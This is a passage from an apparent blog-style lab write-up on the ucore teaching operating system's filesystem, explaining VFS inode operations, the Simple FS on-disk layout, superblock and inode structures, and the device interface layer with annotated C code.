class="line">    .vop_magic                      = VOP_MAGIC,</span><br><span class="line">    .vop_open                       = sfs_opendir,</span><br><span class="line">    .vop_close                      = sfs_close,</span><br><span class="line">    .vop_fstat                      = sfs_fstat,</span><br><span class="line">    .vop_fsync                      = sfs_fsync,</span><br><span class="line">    .vop_namefile                   = sfs_namefile,</span><br><span class="line">    .vop_getdirentry                = sfs_getdirentry,</span><br><span class="line">    .vop_reclaim                    = sfs_reclaim,</span><br><span class="line">    .vop_gettype                    = sfs_gettype,</span><br><span class="line">    .vop_lookup                     = sfs_lookup,</span><br><span class="line">&#125;;</span><br><span class="line"><span class="comment">/// The sfs specific FILE operations correspond to the abstract operations on a inode.</span></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">inode_ops</span> sfs_node_fileops = &#123;</span><br><span class="line">    .vop_magic                      = VOP_MAGIC,</span><br><span class="line">    .vop_open                       = sfs_openfile,</span><br><span class="line">    .vop_close                      = sfs_close,</span><br><span class="line">    .vop_read                       = sfs_read,</span><br><span class="line">    .vop_write                      = sfs_write,</span><br><span class="line">    .vop_fstat                      = sfs_fstat,</span><br><span class="line">    .vop_fsync                      = sfs_fsync,</span><br><span class="line">    .vop_reclaim                    = sfs_reclaim,</span><br><span class="line">    .vop_gettype                    = sfs_gettype,</span><br><span class="line">    .vop_tryseek                    = sfs_tryseek,</span><br><span class="line">    .vop_truncate    
               = sfs_truncfile,</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">inode_ops</span> dev_node_ops = &#123;</span><br><span class="line">    .vop_magic                      = VOP_MAGIC,</span><br><span class="line">    .vop_open                       = dev_open,</span><br><span class="line">    .vop_close                      = dev_close,</span><br><span class="line">    .vop_read                       = dev_read,</span><br><span class="line">    .vop_write                      = dev_write,</span><br><span class="line">    .vop_fstat                      = dev_fstat,</span><br><span class="line">    .vop_ioctl                      = dev_ioctl,</span><br><span class="line">    .vop_gettype                    = dev_gettype,</span><br><span class="line">    .vop_tryseek                    = dev_tryseek,</span><br><span class="line">    .vop_lookup                     = dev_lookup,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>The <code>inode</code> structure is filesystem-dependent: each filesystem supplies its own <code>inode</code> contents. Its existence lets the VFS ignore the differences between the filesystems below it and concentrate on providing one uniform filesystem interface. An <code>inode</code> behaves differently depending on what its <code>in_info</code> holds.</p><blockquote><p>The filesystem abstraction layer (VFS) provides the file, dir, inode, fs, and peripheral-device interfaces. These interfaces are given concrete implementations in <code>sfs</code>.</p></blockquote><h5 id="3-Simple-FS-文件系统层-SFS">3) Simple FS filesystem layer (SFS)</h5><h6 id="概述">Overview</h6><p>One layer below the <code>VFS</code> is <code>SFS</code>.</p><p>The ucore kernel treats every file as a byte stream; any internal logical structure is private to the application, which is responsible for interpreting it. ucore does, however, distinguish files by their physical structure. It currently supports the following file types:</p><ul><li>Regular file: its contents are supplied by the application. SFS imposes no internal structure on regular files and treats their contents as plain bytes.</li><li>Directory: contains a series of entries, each holding a file name and a pointer to the associated 
index node (inode). Directories are organized hierarchically.</li><li>Link: a link is simply an alternative file name for a file that already exists.</li><li>Device file: contains no data, but provides a mechanism for mapping a physical device (such as a serial port or keyboard) to a file name. Peripheral devices are accessed through device files.</li><li>Pipe: a basic facility for inter-process communication. A pipe buffers the data received at its input end so that the process reading from its output end receives it in first-in, first-out order.</li></ul><p>In SFS, directories and regular files share a common set of attributes, which are stored in the index node. SFS manages both through index nodes: an index node holds the key information the operating system needs about a file, such as its attributes, access permissions, and other control information. Several file names may point to the same index node.</p><h6 id="函数接口与数据结构">Function interfaces and data structures</h6><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">sfs_init</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_mount</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">lock_sfs_fs</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">void</span> 
<span class="title">lock_sfs_io</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">unlock_sfs_fs</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">unlock_sfs_io</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_rblock</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">uint32_t</span> blkno, <span class="type">uint32_t</span> nblks)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_wblock</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">uint32_t</span> blkno, <span class="type">uint32_t</span> nblks)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_rbuf</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">size_t</span> len, <span class="type">uint32_t</span> blkno, <span class="type">off_t</span> offset)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_wbuf</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">size_t</span> len, <span class="type">uint32_t</span> blkno, <span class="type">off_t</span> offset)</span></span>;</span><br><span class="line"><span 
class="function"><span class="type">int</span> <span class="title">sfs_sync_super</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_sync_freemap</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_clear_block</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">uint32_t</span> blkno, <span class="type">uint32_t</span> nblks)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_load_inode</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="keyword">struct</span> inode **node_store, <span class="type">uint32_t</span> ino)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">sfs_sync</span><span class="params">(<span class="keyword">struct</span> fs *fs)</span></span>;</span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">inode</span>* <span class="built_in">sfs_get_root</span>(<span class="keyword">struct</span> fs *fs) ;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">sfs_unmount</span><span class="params">(<span class="keyword">struct</span> fs *fs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">sfs_cleanup</span><span class="params">(<span class="keyword">struct</span> fs *fs)</span></span>;</span><br><span 
class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">fs_init_read</span><span class="params">(<span class="keyword">struct</span> device *dev, <span class="type">uint32_t</span> blkno, <span class="type">void</span> *blk_buffer)</span></span>;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">fs_do_mount</span><span class="params">(<span class="keyword">struct</span> device *dev, <span class="keyword">struct</span> fs **fs_store)</span></span>;</span><br><span class="line"><span class="comment">// ......</span></span><br></pre></td></tr></table></figure><p><code>SFS</code> involves two filesystem structures, <code>fs</code> and <code>sfs_fs</code>. <code>fs</code> is the abstract filesystem that upper-level calls operate on directly, while <code>sfs_fs</code> is the one used by lower-level functions. Layering the abstract <code>fs</code> structure on top of <code>sfs_fs</code> hides the differences between filesystems. Both are defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span 
class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Abstract filesystem. (Or device accessible as a file.)</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Information:</span></span><br><span class="line"><span class="comment"> *      fs_info   : filesystem-specific data (sfs_fs)</span></span><br><span class="line"><span class="comment"> *      fs_type   : filesystem type</span></span><br><span class="line"><span class="comment"> * Operations:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *      fs_sync       - Flush all dirty buffers to disk.</span></span><br><span class="line"><span class="comment"> *      fs_get_root   - Return root inode of filesystem.</span></span><br><span class="line"><span class="comment"> *      fs_unmount    - Attempt unmount of filesystem.</span></span><br><span class="line"><span class="comment"> *      fs_cleanup    - Cleanup of filesystem.???</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * fs_get_root should increment the refcount of the inode returned.</span></span><br><span 
class="line"><span class="comment"> * It should not ever return NULL.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * If fs_unmount returns an error, the filesystem stays mounted, and</span></span><br><span class="line"><span class="comment"> * consequently the struct fs instance should remain valid. On success,</span></span><br><span class="line"><span class="comment"> * however, the filesystem object and all storage associated with the</span></span><br><span class="line"><span class="comment"> * filesystem should have been discarded/released.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">fs</span> &#123;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">sfs_fs</span> __sfs_info;</span><br><span class="line">    &#125; fs_info;                                     <span class="comment">// filesystem-specific data</span></span><br><span class="line">    <span class="keyword">enum</span> &#123;</span><br><span class="line">        fs_type_sfs_info,</span><br><span class="line">    &#125; fs_type;                                     <span class="comment">// filesystem type</span></span><br><span class="line">    <span class="built_in">int</span> (*fs_sync)(<span class="keyword">struct</span> fs *fs);                 <span class="comment">// Flush all dirty buffers to disk</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *(*fs_get_root)(<span class="keyword">struct</span> fs *fs);   <span class="comment">// Return root inode of filesystem.</span></span><br><span class="line">    <span class="built_in">int</span> (*fs_unmount)(<span 
class="keyword">struct</span> fs *fs);              <span class="comment">// Attempt unmount of filesystem.</span></span><br><span class="line">    <span class="built_in">void</span> (*fs_cleanup)(<span class="keyword">struct</span> fs *fs);             <span class="comment">// Cleanup of filesystem.???</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">/* filesystem for sfs */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_fs</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sfs_super</span> super;                         <span class="comment">/* on-disk superblock */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">device</span> *dev;                             <span class="comment">/* device mounted on */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">bitmap</span> *freemap;                         <span class="comment">/* blocks in use are mared 0 */</span></span><br><span class="line">    <span class="type">bool</span> super_dirty;                               <span class="comment">/* true if super/freemap modified */</span></span><br><span class="line">    <span class="type">void</span> *sfs_buffer;                               <span class="comment">/* buffer for non-block aligned io */</span></span><br><span class="line">    <span class="type">semaphore_t</span> fs_sem;                             <span class="comment">/* semaphore for fs */</span></span><br><span class="line">    <span class="type">semaphore_t</span> io_sem;                             <span class="comment">/* semaphore for io */</span></span><br><span class="line">    <span class="type">semaphore_t</span> mutex_sem;                          <span 
class="comment">/* semaphore for link/unlink and rename */</span></span><br><span class="line">    <span class="type">list_entry_t</span> inode_list;                        <span class="comment">/* inode linked-list */</span></span><br><span class="line">    <span class="type">list_entry_t</span> *hash_list;                        <span class="comment">/* inode hash linked-list */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>The <code>sfs_fs</code> structure holds the on-disk superblock (<code>super</code>), the device the filesystem is mounted on (<code>dev</code>), and the <code>freemap</code> that records which blocks of the device are allocated, among other fields.</p><h6 id="文件系统布局">Filesystem layout</h6><p>A filesystem normally lives on disk. In this lab the third disk (disk0; the first two are ucore.img and swap.img) holds an SFS (Simple Filesystem) image. Filesystems usually address the disk in sectors, but to keep the implementation simple SFS uses a 4 KB block, the same size as a memory page, as its basic unit.</p><p>The on-disk layout of SFS is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+------------+----------+---------+-------------------------------------+</span><br><span class="line">| superblock | root-dir | freemap | Inode / File Data / Dir Data blocks |</span><br><span class="line">+------------+----------+---------+-------------------------------------+</span><br></pre></td></tr></table></figure><ul><li><p>Block 0 (4 KB) is the superblock. It holds the key parameters of the filesystem, and its contents are loaded into memory when the machine boots or when the filesystem is first accessed. It is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * On-disk 
superblock</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_super</span> &#123;</span><br><span class="line">    <span class="comment">// The magic member lets the kernel check that the disk image is a valid SFS image</span></span><br><span class="line">    <span class="type">uint32_t</span> magic;                                 <span class="comment">/* magic number, should be SFS_MAGIC */</span></span><br><span class="line">    <span class="type">uint32_t</span> blocks;                                <span class="comment">/* # of blocks in fs */</span></span><br><span class="line">    <span class="type">uint32_t</span> unused_blocks;                         <span class="comment">/* # of unused blocks in fs */</span></span><br><span class="line">    <span class="type">char</span> info[SFS_MAX_INFO_LEN + <span class="number">1</span>];                <span class="comment">/* information for sfs  */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p>Block 1 holds the inode of root-dir, which records information about the root directory. root-dir is the root node of the SFS filesystem; starting from this inode, every file under the root directory can be located.</p></li><li><p>Starting at block 2, one bit per block records whether each block in SFS is in use or free. This region is the SFS freemap, and it occupies as many blocks as the total block count requires. In memory it is tracked through the <code>freemap</code> member of <code>sfs_fs</code>.</p></li><li><p>The rest of the disk stores the inodes and data of all other directories and files. Note that although an inode is smaller than a block (4096 B), each inode occupies a whole block to keep the implementation simple.</p></li></ul><h6 id="索引结点">Inodes</h6><ul><li><p>At the <code>sfs</code> level, an <code>inode</code> structure can represent a file (<code>file</code>), a directory (<code>dir</code>), or a device (<code>device</code>). Two members tell you which one it is: the <code>in_info</code> member and the <code>in_ops</code> operations pointer. The function <code>sfs_get_ops</code> below returns the <code>inode</code> operations that match a given type (file or directory):</p><blockquote><p>Note that inode_ops is set in more than one place; the code below is only an example.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * sfs_get_ops - return function addr of fs_node_dirops/sfs_node_fileops</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">inode_ops</span> *</span><br><span class="line"><span class="built_in">sfs_get_ops</span>(<span class="type">uint16_t</span> type) &#123;</span><br><span class="line">    <span class="keyword">switch</span> (type) &#123;</span><br><span class="line">    <span class="keyword">case</span> SFS_TYPE_DIR:</span><br><span class="line">        <span class="keyword">return</span> &amp;sfs_node_dirops;</span><br><span class="line">    <span class="keyword">case</span> SFS_TYPE_FILE:</span><br><span class="line">        <span class="keyword">return</span> &amp;sfs_node_fileops;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;invalid file type %d.\n&quot;</span>, type);</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>When uCore creates an <code>inode</code> structure that <strong>stores a file or directory</strong> (that is, one whose <code>in_info</code> member is of type <code>sfs_inode</code>), it calls <code>sfs_create_inode</code>. This function ties the <code>sfs_inode</code> member of the <code>inode</code> to the matching on-disk node, <code>sfs_disk_inode</code>, so that the node can be operated on through the <code>inode</code> alone.</p><blockquote><p>An <code>inode</code> that describes a device (<code>device</code>) is initialized in other functions and does not go through <code>sfs_create_inode</code>.</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * sfs_create_inode - alloc a inode in memory, and init din/ino/dirty/reclaim_count/sem fields in sfs_inode in inode</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">sfs_create_inode</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="keyword">struct</span> sfs_disk_inode *din, <span class="type">uint32_t</span> ino, <span class="keyword">struct</span> inode **node_store)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *node;</span><br><span class="line">    <span 
class="keyword">if</span> ((node = <span class="built_in">alloc_inode</span>(sfs_inode)) != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">vop_init</span>(node, <span class="built_in">sfs_get_ops</span>(din-&gt;type), <span class="built_in">info2fs</span>(sfs, sfs));</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">sfs_inode</span> *sin = <span class="built_in">vop_info</span>(node, sfs_inode);</span><br><span class="line">        sin-&gt;din = din, sin-&gt;ino = ino, sin-&gt;dirty = <span class="number">0</span>, sin-&gt;reclaim_count = <span class="number">1</span>;</span><br><span class="line">        <span class="built_in">sem_init</span>(&amp;(sin-&gt;sem), <span class="number">1</span>);</span><br><span class="line">        *node_store = node;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> -E_NO_MEM;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p><strong>On-disk inode</strong>: the inode stored on disk</p><p>The <code>sfs_disk_inode</code> structure records where the contents of a file or directory are stored. It lives on disk and is read into memory when needed. The <code>type</code> member says whether the node is a directory, a file, or a link (<code>link</code>). If the <code>inode</code> represents a file, the entries of <code>direct[]</code> are the indices of the data blocks that hold the file's contents. <code>indirect</code> is the index of an indirect block, which contains nothing but data-block indices; the blocks those indices point to hold the file's contents.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* file types */</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SFS_TYPE_INVAL                              0       <span class="comment">/* Should not appear on disk */</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SFS_TYPE_FILE                               1</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SFS_TYPE_DIR                                2</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> SFS_TYPE_LINK                               3</span></span><br><span class="line"><span class="comment">/* inode (on disk) */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_disk_inode</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span> size;                                  <span class="comment">/* size of the file (in bytes) */</span></span><br><span class="line">    <span class="type">uint16_t</span> type;                                  <span class="comment">/* one of SYS_TYPE_* above */</span></span><br><span class="line">    <span class="type">uint16_t</span> nlinks;                                <span class="comment">/* # of hard links to this file */</span></span><br><span class="line">    <span class="type">uint32_t</span> blocks;                                <span class="comment">/* # of blocks */</span></span><br><span class="line">    <span class="type">uint32_t</span> direct[SFS_NDIRECT];                   <span class="comment">/* direct blocks */</span></span><br><span class="line">    <span class="type">uint32_t</span> indirect;                              <span class="comment">/* indirect blocks */</span></span><br><span 
class="line">&#125;;</span><br></pre></td></tr></table></figure><p>For a regular file, the blocks these indices point to hold the file's data. For a directory, they hold an array of entries, each pairing a file name with the number of the disk block that contains that file's inode. The entry structure is:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* file entry (on disk) */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_disk_entry</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span> ino;                                   <span class="comment">/* inode number */</span></span><br><span class="line">    <span class="type">char</span> name[SFS_MAX_FNAME_LEN + <span class="number">1</span>];               <span class="comment">/* file name */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure></li><li><p><strong>In-memory inode</strong>: the inode kept in memory</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* inode for sfs */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_inode</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sfs_disk_inode</span> *din;                     <span class="comment">/* on-disk inode */</span></span><br><span class="line">    <span class="type">uint32_t</span> ino;                                   <span class="comment">/* 
inode number */</span></span><br><span class="line">    <span class="type">bool</span> dirty;                                     <span class="comment">/* true if inode modified */</span></span><br><span class="line">    <span class="type">int</span> reclaim_count;                              <span class="comment">/* kill inode if it hits zero */</span></span><br><span class="line">    <span class="type">semaphore_t</span> sem;                                <span class="comment">/* semaphore for din */</span></span><br><span class="line">    <span class="type">list_entry_t</span> inode_link;                        <span class="comment">/* entry for linked-list in sfs_fs */</span></span><br><span class="line">    <span class="type">list_entry_t</span> hash_link;                         <span class="comment">/* entry for hash linked-list in sfs_fs */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Besides the on-disk <code>sfs_disk_inode</code>, the in-memory <code>sfs_inode</code> carries extra state used to track whether the inode has been modified (<code>dirty</code>), to serialize access (<code>sem</code>), to reclaim the inode (<code>reclaim_count</code>), and to locate it quickly (the list and hash links).</p><blockquote><p>Note that an in-memory <code>sfs_inode</code> is created only when a file is opened, and it is lost on shutdown. The on-disk <code>sfs_disk_inode</code> persists on disk and is read into memory only when a process needs it to access the contents of a file or directory.</p></blockquote></li><li><p><strong>File entry</strong>: a node that <strong>points to an on-disk inode</strong>. Its structure is:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* file entry (on disk) */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_disk_entry</span> &#123;</span><br><span class="line">    <span class="type">uint32_t</span> ino;                                   <span class="comment">/* inode number */</span></span><br><span class="line">    <span class="type">char</span> 
name[SFS_MAX_FNAME_LEN + <span class="number">1</span>];               <span class="comment">/* file name */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>In a file entry, <code>name</code> is the name of the file and <code>ino</code> points to its on-disk inode, <code>sfs_disk_inode</code>. The inode of the parent directory in turn points to the file entries beneath it.</p><blockquote><p>Keeping file entries separate from on-disk inodes makes <strong>hard links</strong> easier to implement.</p></blockquote></li><li><p>To make the multi-level block access described above and the handling of directory entries easier, SFS implements several helper functions for <code>inode</code>:</p><blockquote><p>Note: the behavior of these functions is best understood in detail by reading the source.</p></blockquote><ul><li><p><code>sfs_bmap_load_nolock</code></p><blockquote><p>Looks up the block that the <code>index</code>-th index of the given <code>sfs_inode</code> refers to and stores its block number in the location the caller passes (<code>ino_store</code>).</p></blockquote></li></ul><blockquote><p>If <code>index == din-&gt;blocks</code>, the <code>inode</code> grows by one block and is marked dirty.</p></blockquote><ul><li><p><code>sfs_bmap_truncate_nolock</code></p><blockquote><p>Frees the last entry of the multi-level block index. It can be seen as the inverse of <code>sfs_bmap_load_nolock</code> called with <code>index == din-&gt;blocks</code>.</p></blockquote></li><li><p><code>sfs_dirent_read_nolock</code></p><blockquote><p>Reads the entry in the given slot of a directory into the specified memory.</p></blockquote></li><li><p><code>sfs_dirent_search_nolock</code></p><blockquote><p>This is the common lookup function. It searches a directory for name and returns the inode number of the match (a file or a directory; the inode number is also its disk block number), the index of the matching entry within the directory, and whether the directory's data pages contain a free entry.</p></blockquote></li></ul><blockquote><p>Note that functions with the <code>nolock</code> suffix may only be called once the caller already holds the <code>semaphore</code> of the corresponding <code>inode</code>.</p></blockquote></li></ul><h5 id="4-外设接口层-I-O设备">4) Device interface layer (I/O devices)</h5><ul><li><p>One layer further down is the implementation of I/O devices, for example the <code>device</code> structure:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> dop_open(dev, open_flags)           ((dev)-&gt;d_open(dev, open_flags))</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> dop_close(dev)                      ((dev)-&gt;d_close(dev))</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> dop_io(dev, iob, write)             ((dev)-&gt;d_io(dev, iob, write))</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> dop_ioctl(dev, op, data)            ((dev)-&gt;d_ioctl(dev, op, data))</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">device</span> &#123;</span><br><span class="line">    <span class="type">size_t</span> d_blocks;</span><br><span class="line">    <span class="type">size_t</span> d_blocksize;</span><br><span class="line">    <span class="built_in">int</span> (*d_open)(<span class="keyword">struct</span> device *dev, <span class="type">uint32_t</span> open_flags);</span><br><span class="line">    <span class="built_in">int</span> (*d_close)(<span class="keyword">struct</span> device *dev);</span><br><span class="line">    <span class="built_in">int</span> (*d_io)(<span class="keyword">struct</span> device *dev, <span class="keyword">struct</span> iobuf *iob, <span class="type">bool</span> write);</span><br><span class="line">    <span class="built_in">int</span> (*d_ioctl)(<span class="keyword">struct</span> device *dev, <span class="type">int</span> op, <span class="type">void</span> *data);</span><br><span 
